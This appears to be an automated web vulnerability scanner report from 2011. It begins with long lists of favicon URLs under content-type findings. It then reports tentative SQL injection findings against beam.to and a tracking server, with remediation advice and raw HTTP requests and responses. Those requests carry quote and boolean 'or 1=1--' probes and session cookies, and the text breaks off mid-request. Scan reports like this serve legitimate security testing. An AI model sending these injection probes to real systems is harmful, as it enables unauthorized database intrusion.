27.1466. http://www.silverscreenandroll.com/favicon.ico

27.1467. http://www.simpleanddelicious.com/favicon.ico

27.1468. http://www.simplegiftsfarm.com/favicon.ico

27.1469. http://www.simply.tv/favicon.ico

27.1470. http://www.simplyaudiobooks.com/favicon.ico

27.1471. http://www.singtao.com/favicon.ico

27.1472. http://www.siuc.edu/favicon.ico

27.1473. http://www.sixt.com/favicon.ico

27.1474. http://www.skincareresourcecenter.com/favicon.ico

27.1475. http://www.slapadoodle.net/favicon.ico

27.1476. http://www.slashgossip.com/favicon.ico

27.1477. http://www.sld.cu/favicon.ico

27.1478. http://www.sleepconnect.com/favicon.ico

27.1479. http://www.smartcart.com/favicon.ico

27.1480. http://www.smashbox.com/favicon.ico

27.1481. http://www.smccme.edu/favicon.ico

27.1482. http://www.smnnews.com/favicon.ico

27.1483. http://www.smokin4free.com/favicon.ico

27.1484. http://www.snapsurveys.com/favicon.ico

27.1485. http://www.snipercountry.com/favicon.ico

27.1486. http://www.snipershide.com/favicon.ico

27.1487. http://www.soapoperafan.com/favicon.ico

27.1488. http://www.soccerbyives.net/favicon.ico

27.1489. http://www.softgeek.net/favicon.ico

27.1490. http://www.softlow.com/favicon.ico

27.1491. http://www.solostream.com/favicon.ico

27.1492. http://www.somospelota.com/favicon.ico

27.1493. http://www.song.ly/favicon.ico

27.1494. http://www.sonichealthcareusa.com/favicon.ico

27.1495. http://www.sonicretro.org/favicon.ico

27.1496. http://www.sonicstate.com/favicon.ico

27.1497. http://www.sonoraquest.com/favicon.ico

27.1498. http://www.sonorika.com/favicon.ico

27.1499. http://www.sooperarticles.com/favicon.ico

27.1500. http://www.sosstaffing.com/favicon.ico

27.1501. http://www.sound-effect.com/favicon.ico

27.1502. http://www.soundtrack.net/favicon.ico

27.1503. http://www.sourcingmap.com/favicon.ico

27.1504. http://www.southalabama.edu/favicon.ico

27.1505. http://www.southcoastreport.com/favicon.ico

27.1506. http://www.spaguts.com/favicon.ico

27.1507. http://www.sportrider.com/favicon.ico

27.1508. http://www.sportsmansparadiseonline.com/favicon.ico

27.1509. http://www.springtrainingonline.com/favicon.ico

27.1510. http://www.spywarefixpro.com/favicon.ico

27.1511. http://www.ssssssssss.in/favicon.ico

27.1512. http://www.st.com/favicon.ico

27.1513. http://www.startovertoday.com/favicon.ico

27.1514. http://www.state.de.us/favicon.ico

27.1515. http://www.state.nd.us/favicon.ico

27.1516. http://www.statejournal.com/favicon.ico

27.1517. http://www.stateline.org/favicon.ico

27.1518. http://www.stats4free.de/favicon.ico

27.1519. http://www.steampunkworkshop.com/favicon.ico

27.1520. http://www.stereophile.com/favicon.ico

27.1521. http://www.straight.com/favicon.ico

27.1522. http://www.strasburgrailroad.com/favicon.ico

27.1523. http://www.strausnews.com/favicon.ico

27.1524. http://www.streetprices.com/favicon.ico

27.1525. http://www.streetrodderweb.com/favicon.ico

27.1526. http://www.stumpsparty.com/favicon.ico

27.1527. http://www.subastandolo.com.mx/favicon.ico

27.1528. http://www.suggestexplorer.com/favicon.ico

27.1529. http://www.summerdrive2010.com/favicon.ico

27.1530. http://www.sunstar.com.ph/favicon.ico

27.1531. http://www.superatv.com/favicon.ico

27.1532. http://www.superglossary.com/favicon.ico

27.1533. http://www.superherorelease.com/favicon.ico

27.1534. http://www.supersupportspot.com/favicon.ico

27.1535. http://www.supertopo.com/favicon.ico

27.1536. http://www.surewest.net/favicon.ico

27.1537. http://www.surfers.ro/favicon.ico

27.1538. http://www.surfmusic.de/favicon.ico

27.1539. http://www.surnamesite.com/favicon.ico

27.1540. http://www.surveyentrance.com/favicon.ico

27.1541. http://www.surveymoneymachine.com/favicon.ico

27.1542. http://www.suzukipartshouse.net/favicon.ico

27.1543. http://www.sw.org/favicon.ico

27.1544. http://www.sweetnicki.com/favicon.ico

27.1545. http://www.sweetpoison.com/favicon.ico

27.1546. http://www.sweetsingles.com/favicon.ico

27.1547. http://www.sytropin.com/favicon.ico

27.1548. http://www.tableclothsfactory.com/favicon.ico

27.1549. http://www.tacomaworld.com/favicon.ico

27.1550. http://www.tagomatic.com/favicon.ico

27.1551. http://www.tagsellit.com/favicon.ico

27.1552. http://www.tahiti-tourisme.com/favicon.ico

27.1553. http://www.tahoesbest.com/favicon.ico

27.1554. http://www.talk2action.org/favicon.ico

27.1555. http://www.talkorigins.org/favicon.ico

27.1556. http://www.tammysrecipes.com/favicon.ico

27.1557. http://www.taoofherbs.com/favicon.ico

27.1558. http://www.taxadmin.org/favicon.ico

27.1559. http://www.taxslayer.com/favicon.ico

27.1560. http://www.tbd.com/favicon.ico

27.1561. http://www.tblc.org/favicon.ico

27.1562. http://www.teaching-english-in-japan.net/favicon.ico

27.1563. http://www.technewsdaily.com/favicon.ico

27.1564. http://www.techsoup.org/favicon.ico

27.1565. http://www.tedsmontanagrill.com/favicon.ico

27.1566. http://www.teen18yo.com/favicon.ico

27.1567. http://www.teenomg.com/favicon.ico

27.1568. http://www.tehparadox.com/favicon.ico

27.1569. http://www.tel3advantage.com/favicon.ico

27.1570. http://www.telescopes.com/favicon.ico

27.1571. http://www.templates.com/favicon.ico

27.1572. http://www.tennesseethisweek.com/favicon.ico

27.1573. http://www.terabitz.com/favicon.ico

27.1574. http://www.teriskitchen.com/favicon.ico

27.1575. http://www.tesco.net/favicon.ico

27.1576. http://www.texasmonthly.com/favicon.ico

27.1577. http://www.texasoutside.com/favicon.ico

27.1578. http://www.thaivisa.com/favicon.ico

27.1579. http://www.thane.com/favicon.ico

27.1580. http://www.the-leader.com/favicon.ico

27.1581. http://www.theagapecenter.com/favicon.ico

27.1582. http://www.theamericanmonk.com/members/forgot-password

27.1583. http://www.theattractionforums.com/favicon.ico

27.1584. http://www.thebidsearch.com/favicon.ico

27.1585. http://www.thecalifornian.com/favicon.ico

27.1586. http://www.thechildrenswearoutlet.com/favicon.ico

27.1587. http://www.thecitizen.com/favicon.ico

27.1588. http://www.thecuriousdreamer.com/favicon.ico

27.1589. http://www.thedollpalace.com/favicon.ico

27.1590. http://www.thefirstpost.co.uk/favicon.ico

27.1591. http://www.thehawkeye.com/favicon.ico

27.1592. http://www.thehealthplan.com/favicon.ico

27.1593. http://www.thehockeynews.com/favicon.ico

27.1594. http://www.thehorrordome.com/favicon.ico

27.1595. http://www.thelaughtermovie.com/favicon.ico

27.1596. http://www.thelocal.de/favicon.ico

27.1597. http://www.themeltingpotclubfondue.com/favicon.ico

27.1598. http://www.themlsonline.com/favicon.ico

27.1599. http://www.thenoobschool.com/favicon.ico

27.1600. http://www.thepartyworks.com/favicon.ico

27.1601. http://www.theperformanceleader.com/favicon.ico

27.1602. http://www.therunaways.com/favicon.ico

27.1603. http://www.theshoemart.com/favicon.ico

27.1604. http://www.thesunsfinancialdiary.com/favicon.ico

27.1605. http://www.thetvnet.com/favicon.ico

27.1606. http://www.theusgenweb.org/favicon.ico

27.1607. http://www.thewebfiles.com/favicon.ico

27.1608. http://www.thewhatifmovie.com/favicon.ico

27.1609. http://www.thewheelconnection.com/favicon.ico

27.1610. http://www.theworldsbestever.com/favicon.ico

27.1611. http://www.thewvsr.com/favicon.ico

27.1612. http://www.thinkdigit.com/favicon.ico

27.1613. http://www.thisibelieve.org/favicon.ico

27.1614. http://www.ticalc.org/favicon.ico

27.1615. http://www.tightrope.cc/favicon.ico

27.1616. http://www.tipdeck.com/favicon.ico

27.1617. http://www.tire-information-world.com/favicon.ico

27.1618. http://www.tireteam.com/favicon.ico

27.1619. http://www.tna.com/favicon.ico


28. Multiple content types specified

28.1. http://www.fellowes.com/favicon.ico

28.2. http://www.virginialottery.com/favicon.ico

29. HTML does not specify charset


30. HTML uses unrecognised charset


31. Content type incorrectly stated


31.165. http://www.ofree.net/favicon.ico

31.166. http://www.onecallnow.com/favicon.ico

31.167. http://www.onlineincomeflood.com/favicon.ico

31.168. http://www.orb.com/favicon.ico

31.169. http://www.ouc.com/favicon.ico

31.170. http://www.pazsaz.com/favicon.ico

31.171. http://www.pcc.edu/favicon.ico

31.172. http://www.petstore.com/favicon.ico

31.173. http://www.pfchangshomemenu.com/favicon.ico

31.174. http://www.playbillstore.com/favicon.ico

31.175. http://www.pny.com/favicon.ico

31.176. http://www.poolpartsonline.com/favicon.ico

31.177. http://www.popsugar.co.uk/favicon.ico

31.178. http://www.posterrevolution.com/favicon.ico

31.179. http://www.povo.com/favicon.ico

31.180. http://www.preschoolexpress.com/favicon.ico

31.181. http://www.quantumjumping.com/media/images/a/meditation4.png

31.182. http://www.quiltersclubofamerica.com/favicon.ico

31.183. http://www.radiological.com/favicon.ico

31.184. http://www.rajshri.com/favicon.ico

31.185. http://www.reservebranson.com/favicon.ico

31.186. http://www.rmatrackr.com/favicon.ico

31.187. http://www.runningwarehouse.com/favicon.ico

31.188. http://www.saclibrary.org/favicon.ico

31.189. http://www.sanjeevkapoor.com/favicon.ico

31.190. http://www.savvysugar.com/favicon.ico

31.191. http://www.sccommed.org/favicon.ico

31.192. http://www.scjohnson.com/favicon.ico

31.193. http://www.screamindailydeals.com/favicon.ico

31.194. http://www.seaeagle.com/favicon.ico

31.195. http://www.sharenator.org/favicon.ico

31.196. http://www.sibcycline.com/favicon.ico

31.197. http://www.silobreaker.com/favicon.ico

31.198. http://www.sinclairinstitute.com/favicon.ico

31.199. http://www.sitewit.com/favicon.ico

31.200. http://www.slb.com/favicon.ico

31.201. http://www.smsumustangs.com/favicon.ico

31.202. http://www.softlinens.com/favicon.ico

31.203. http://www.startexpower.com/favicon.ico

31.204. http://www.stratfordfestival.ca/favicon.ico

31.205. http://www.systweak.com/favicon.ico

31.206. http://www.tabletpcreview.com/favicon.ico

31.207. http://www.tbd.com/favicon.ico

31.208. http://www.thecompassstore.com/favicon.ico

31.209. http://www.thefreeiqtest.org/favicon.ico

31.210. http://www.thegrocerygame.com/favicon.ico

31.211. http://www.thegroveataltaridge.com/favicon.ico

31.212. http://www.theperfumespot.com/favicon.ico

31.213. http://www.therapeuticresearch.com/favicon.ico

31.214. http://www.thescooterstoreonline.com/favicon.ico

31.215. http://www.ticketseating.com/favicon.ico

31.216. http://www.topoftheline.com/favicon.ico

31.217. http://www.tripplite.com/favicon.ico

31.218. http://www.tsppilot.com/favicon.ico

31.219. http://www.tunewiki.com/favicon.ico

31.220. http://www.tv2.no/favicon.ico

31.221. http://www.uniqlo.com/favicon.ico

31.222. http://www.utne.com/favicon.ico

31.223. http://www.uwgb.edu/favicon.ico

31.224. http://www.vacuumpartstore.com/favicon.ico

31.225. http://www.vegasview.com/favicon.ico

31.226. http://www.viewmylisting.com/favicon.ico

31.227. http://www.wackyplanet.com/favicon.ico

31.228. http://www.webcam-fun.org/favicon.ico

31.229. http://www.webgreeter.com/favicon.ico

31.230. http://www.wellspan.org/favicon.ico

31.231. http://www.wherethelocalseat.com/favicon.ico

31.232. http://www.whosaliveandwhosdead.com/favicon.ico

31.233. http://www.winsornewton.com/favicon.ico

31.234. http://www.winwithpaperless.com/favicon.ico

31.235. http://www.wirelessground.com/favicon.ico

31.236. http://www.wizardworld.com/favicon.ico

31.237. http://www.wjr.com/favicon.ico

31.238. http://www.worden.com/favicon.ico

31.239. http://www.worldsoffun.com/favicon.ico

31.240. http://www.wpr.org/favicon.ico

31.241. http://www.writeaprisoner.com/favicon.ico

31.242. http://www.xftvgirls.com/favicon.ico

31.243. http://www.xignite.com/favicon.ico

31.244. http://www.yapchat.com/favicon.ico

31.245. http://www.zgallerie.com/favicon.ico

31.246. http://www.zumie.com/favicon.ico

32. Content type is not specified

32.1. http://www.actionallstars.com/favicon.ico

32.2. http://www.allergan.com/favicon.ico

32.3. http://www.amex.com/favicon.ico

32.4. http://www.analog.com/favicon.ico

32.5. http://www.animalleague.org/favicon.ico

32.6. http://www.autism-society.org/favicon.ico

32.7. http://www.bizsiteservice.com/favicon.ico

32.8. http://www.burntorangereport.com/favicon.ico

32.9. http://www.drgreene.com/favicon.ico

32.10. http://www.egyptair.com/favicon.ico

32.11. http://www.embark.com/favicon.ico

32.12. http://www.evaphone.com/favicon.ico

32.13. http://www.fluor.com/favicon.ico

32.14. http://www.gemvara.com/favicon.ico

32.15. http://www.greentreepayday.com/favicon.ico

32.16. http://www.homeawayrealestate.com/favicon.ico

32.17. http://www.homegauge.com/favicon.ico

32.18. http://www.hotelguide.com/favicon.ico

32.19. http://www.hrs.com/favicon.ico

32.20. http://www.iccsafe.org/favicon.ico

32.21. http://www.individualhealthquotes.com/favicon.ico

32.22. http://www.jaycfoods.com/favicon.ico

32.23. http://www.kaplan.com/favicon.ico

32.24. http://www.lakecountyil.gov/favicon.ico

32.25. http://www.newholland.com/favicon.ico

32.26. http://www.oge.com/favicon.ico

32.27. http://www.ppg.com/favicon.ico

32.28. http://www.purolatorautofilters.net/favicon.ico

32.29. http://www.rotohog.com/favicon.ico

32.30. http://www.softballsavings.com/favicon.ico

32.31. http://www.southeasttech.edu/favicon.ico

32.32. http://www.statoil.com/favicon.ico

32.33. http://www.tel3advantage.com/favicon.ico

32.34. http://www.thebar.com/favicon.ico

32.35. http://www.tickettoread.com/favicon.ico

32.36. http://www.topsofts.com/favicon.ico

32.37. http://www.ucc.org/favicon.ico

32.38. http://www.usmc-mccs.org/favicon.ico

32.39. http://www.ziploc.com/favicon.ico

1. SQL injection
There are 27 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://beam.to/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:57 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:16:01 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.2. http://beam.to/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:28 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:29 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.3. http://beam.to/index.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /index.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.asp' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:23 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /index.asp'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:24 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.4. http://beam.to/login.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /login.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /login.asp' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:24 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /login.asp'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:26 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.5. http://beam.to/start.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /start.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /start.asp' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:17 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /start.asp'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:18 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.6. http://tracking.moon-ray.com/track.php [s parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. The payloads 40656182'%20or%201%3d1--%20 and 40656182'%20or%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/members/forgot-password&s=ysv9sd684163c3y40656182'%20or%201%3d1--%20&l=www.theamericanmonk.com/members/forgot-password&ti=Members%20-%20Forgot%20Password%20-%20The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 00:56:54 GMT
Connection: Keep-Alive
Set-Cookie: sess_=ysv9sd684163c3y40656182%27+or+1%3D1--+; path=/
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 225

_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617896;' + _mr_ex + ';' + 'path=/';_mrd.cookie='contact_id=51;' + _mr_ex + ';' + 'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

Request 2

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/members/forgot-password&s=ysv9sd684163c3y40656182'%20or%201%3d2--%20&l=www.theamericanmonk.com/members/forgot-password&ti=Members%20-%20Forgot%20Password%20-%20The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 00:57:34 GMT
Connection: Keep-Alive
Set-Cookie: sess_=ysv9sd684163c3y40656182%27+or+1%3D2--+; path=/
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 168

_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617910;' + _mr_ex + ';' + 'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

1.7. http://tracking.moon-ray.com/track.php [sess_ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The sess_ cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sess_ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_7&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
